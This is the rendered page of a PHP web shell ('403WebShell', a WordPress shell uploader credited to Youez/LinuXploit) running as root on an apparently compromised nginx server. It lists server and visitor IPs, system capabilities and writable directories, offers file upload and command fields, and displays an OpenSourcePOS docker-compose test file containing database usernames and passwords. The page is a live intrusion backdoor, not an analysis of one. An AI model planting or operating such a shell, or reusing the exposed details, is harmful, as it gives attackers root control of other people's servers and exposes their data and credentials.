Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.248
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/domum.gamliel.mx/htdocs/opensourcepos/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/domum.gamliel.mx/htdocs/opensourcepos/docker-compose.test.yml
version: '3.4'
  
services:
    test: 
        build:
            context: .
            target: ospos_test
        depends_on: 
          - mysql
        container_name: ospos_test
        environment:
          - CI_ENV=testing
          - ENCRYPTION_KEY=
          - MYSQL_HOST_NAME=mysql
          - MYSQL_DATABASE=ospos
          - MYSQL_USERNAME=admin
          - MYSQL_PASSWORD=pointofsale
        command: ["/bin/wait-for-it.sh", "mysql:3306", "--", "/app/vendor/phpunit/phpunit/phpunit"]
        ports:
          - "80:80"

    mysql:
        image: mariadb:10.5
        container_name: mysql
        restart: always
        volumes:
          - ./database/database.sql:/docker-entrypoint-initdb.d/database.sql
        environment:
          - MYSQL_ROOT_PASSWORD=pointofsale
          - MYSQL_DATABASE=ospos
          - MYSQL_USER=admin
          - MYSQL_PASSWORD=pointofsale

Youez - 2016 - github.com/yon3zu
LinuXploit